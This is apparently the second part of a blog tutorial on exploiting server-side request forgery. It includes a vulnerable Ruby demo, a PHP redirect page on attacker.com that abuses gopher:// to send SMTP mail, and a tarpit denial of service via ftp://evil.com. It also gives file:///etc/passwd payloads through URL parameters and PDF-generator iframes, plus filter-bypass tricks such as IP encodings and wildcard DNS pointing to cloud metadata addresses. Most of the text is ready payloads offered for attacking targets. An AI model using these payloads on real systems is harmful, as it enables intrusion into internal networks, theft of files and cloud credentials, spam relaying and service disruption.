SSRF — Server Side Request Forgery (Types and ways to exploit it) Part-2
We discussed Basic SSRF in Part -1, now we will continue with Blind
ii. Blind -
Not all SSRF vulnerabilities return the response to the attacker. This type of SSRF is known as blind SSRF
Exploiting Blind SSRF -
DEMO (using Ruby)
require 'sinatra'
require 'open-uri'
get '/' do
open params[:url]
'done'
endThe above code runs a server on port 4567 which on getting request does the following:
> make request to URL mentioned by user
> send reponse “OK” back to user instead of content(CANT SEE RESPONSE)
http://localhost:4567/?url=https://google.com will request google.com but does not show the response from google to attacker
To demonstrate impact with this kind of SSRF is to run an Internal IP and PORT scan
Here’s a list of private IPv4 networks that you could scan for services:
- 10.0.0.0/8
- 127.0.0.1/32
- 172.16.0.0/12
- 192.168.0.0/16
We can determine whether the specified PORT is Open/Closed by observing the Response Status and Response Time
Below is the example table of response status and time
Send Spam mails -
In some case if the server supports Gopher we use it to send spam mails from server IP
To demonstrate we will use test.smtp.org testing server.
Let’s craft a malicious php page :
http://attacker.com/ssrf/gopher.php
<?php
$commands = array(
'HELO test.org',
'MAIL FROM: <admin@server.com>',
'RCPT TO: <bit-bucket@test.smtp.org>',
'DATA',
'Test mail',
'.'
); $payload = implode('%0A', $commands); header('Location: gopher://test.smtp.org:25/_'.$payload);
?>
https://example.com/ssrf.php?url=http://attacker.com/ssrf/gopher.php
This code concats our SMTP command into one line delimited by %0A and forces server to send a ‘GOPHER’ request to a SMTP server while actually sending a valid SMTP request
Performing Denial of service -
An attacker can use iptables TARPIT target to block requests for a prolonged time and CURL’s FTP:// protocol which never timeouts.
An attacker can send all TCP traffic to port 12345 to TARPIT and the request
https://example.com/ssrf/url?url=ftp://evil.com:12345/TEST
2. Test Cases -
Places to look for SSRF
End points which fetch external/internal resources -
Case I-
http://example.com/index.php?page=about.php
http://example.com/index.php?page=https://google.com
http://example.com/index.php?page=file:///etc/passwd
Refer - Link
Case -II
Try changing urls in POST request
POST /test/demo_form.php HTTP/1.1
Host: example.comurl=https://example.com/as&name2=value2
PDF generators -
There are some cases where server converts uploaded file to a pdf
Try injecting <iframe>, <img>, <base> or <script> elements or CSS url() functions pointing to internal services.
You can read internal files using this
<iframe src=”file:///etc/passwd” width=”400" height=”400"><iframe src=”file:///c:/windows/win.ini” width=”400" height=”400">
Refer - Link
File uploads -
Instead of uploading try changing input type to URL and check if the server sends a request to it
<input type=”file” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””>to
<input type=”url” id=”upload_file” name=”upload_file[]” class=”file” size=”1" multiple=””>and Pass the URL
Video Conversion -
There are many applications using outdated version ffmpeg to convert videos from one format to other
There is know SSRF vulnerability in this
Clone neex repo and generate an avi using below command
./gen_xbin_avi.py file://<filename> file_read.avi
and upload it in the vulnerable server and try converting it from avi to mp4
this reads can be used to read internal file and write in to the video
Know SSRF vulnerabilities in CMS ,Plugins, Themes..
This is limited to your search knowledge
3. Bypass Whitelisting and Blacklisting -
Lets talk about whitelisting and blacklisting first
whitelisting - Allowing specific URL’s (Allowed Hosts)
Lets say if a server whitelist google.com and u can fetch only google.com using SSRF and rest all other domains get rejected
The only way to bypass whitelisting is find an open redirect in the whitelisted domain. Lets look in to example
Case - 1
www.example.com whitelisted abc.com and you found SSRF in example.com
http://example.com/ssrf.php?url=https://google.com -Fails to fetch as it is not whitelisted
http://example.com/ssrf.php?url=http://abc.com/?redirect=https://google.com - Successfully fetches google.com
Case - 2
www.example.com whitelisted *.abc.com and you found SSRF in example.com
http://example.com/ssrf.php?url=https://google.com -Fails to fetch as it is not whitelisted
This can be bypassed if you get any subdomain takeover on *.abc.com
and use it to iframe or redirect it to desired site
http://example.com/ssrf.php?url=http://subdomain.abc.com/?redirect=https://google.com — Successfully fetches google.com
blacklisting - Blocking specific URL’s (Disallowed Hosts)
In the same way if a server blacklist google.com and when you ask the server to fetch google.com it blocks
Blacklisting can be bypassed in many ways
Converting IP to hexadecimal -
example - converting http://192.168.0.1 to doted hex - http://c0.a8.00.01 and dot less hex http://0xc0a80001
Converting IP to Decimal -
Use any online convertors ( Link )
http://0177.0.0.1/ = http://127.0.0.1
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1Converting IP to Octal -
example — converting http://192.168.0.1 to doted octal http://0300.0250.0000.0001 and dot less http://030052000001
Refer - #288250
Using wildcard DNS -
There are many sites online provide wildcard DNS, some of them are
U can simply use them to point it to a specific IP
10.0.0.1.xip.io resolves to 10.0.0.1
www.10.0.0.1.xip.io resolves to 10.0.0.1
mysite.10.0.0.1.xip.io resolves to 10.0.0.1
foo.bar.10.0.0.1.xip.io resolves to 10.0.0.1
ssrf-cloud.localdomain.pw resolves to 169.254.169.254
metadata.nicob.net resolves to 169.254.169.254Or you can use your own domain to do this
Make a subdomain and point to 192.168.0.1 with DNS A record
Using enclosed alphanumerics -
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿./End of Part -2
